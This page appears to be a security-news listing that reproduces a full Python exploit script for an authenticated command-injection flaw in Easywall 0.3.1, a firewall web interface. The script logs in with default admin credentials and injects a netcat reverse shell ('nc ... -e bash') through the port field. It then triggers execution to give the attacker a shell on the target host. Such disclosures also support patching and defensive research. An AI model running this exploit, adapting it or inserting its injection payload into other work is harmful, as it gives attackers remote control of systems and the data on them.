Security
Headlines
HeadlinesLatestCVEs

Headline

Easywall 0.3.1 Remote Command Execution

Easywall version 0.3.1 suffers from an authenticated remote command execution vulnerability.

Packet Storm
#vulnerability#ubuntu#js#git#auth
# Exploit Title: Easywall 0.3.1 - Authenticated Remote Command Execution# Date: 30-11-2023# Exploit Author: Melvin Mejia# Vendor Homepage: https://jpylypiw.github.io/easywall/# Software Link: https://github.com/jpylypiw/easywall# Version: 0.3.1# Tested on: Ubuntu 22.04import requests, json, urllib3urllib3.disable_warnings()def exploit():        # Replace values needed here    target_host = "192.168.1.25"    target_port= "12227"    lhost = "192.168.1.10"    lport = "9001"    user = "admin"    password = "admin"        target = f"https://{target_host}:{target_port}"    # Authenticate to the app    print("[+] Attempting login with the provided credentials...")    login_data = {"username":user, "password":password}    session = requests.session()    try:        login = session.post(f'{target}/login',data=login_data,verify=False)    except Exception as ex:        print("[!] There was a problem connecting to the app, error:", ex)        exit(1)    if login.status_code != 200:        print("[!] Login failed.")        exit(1)    else:        print("[+] Login successfull.")            # Send the payload, the port parameter suffers from a command injection vulnerability    print("[+] Attempting to send payload.")    rev_shell = f'/usr/bin/nc {lhost} {lport} -e bash #'    data = {"port":f"123;{rev_shell}", "description":"","tcpudp":"tcp"}    send_payload = session.post(f"{target}/ports-save",data=data,verify=False)    if send_payload.status_code != 200:        print("[!] Failed to send payload.")        exit(1)    else:        print("[+] Payload sent.")    # Trigger the execution of the payload    print("[+] Attempting execution.")    data = {"step_1":"", "step_2":""}    execute = session.post(f"{target}/apply-save",data=data, verify=False)    if execute.status_code != 200:        print("[!] Attempt to execute failed.")        exit(1)    else:        print(f"[+] Execution succeded, you should have gotten a shell at {lhost}:{lport}.")exploit()

Packet Storm: Latest News

Ubuntu Security Notice USN-7121-3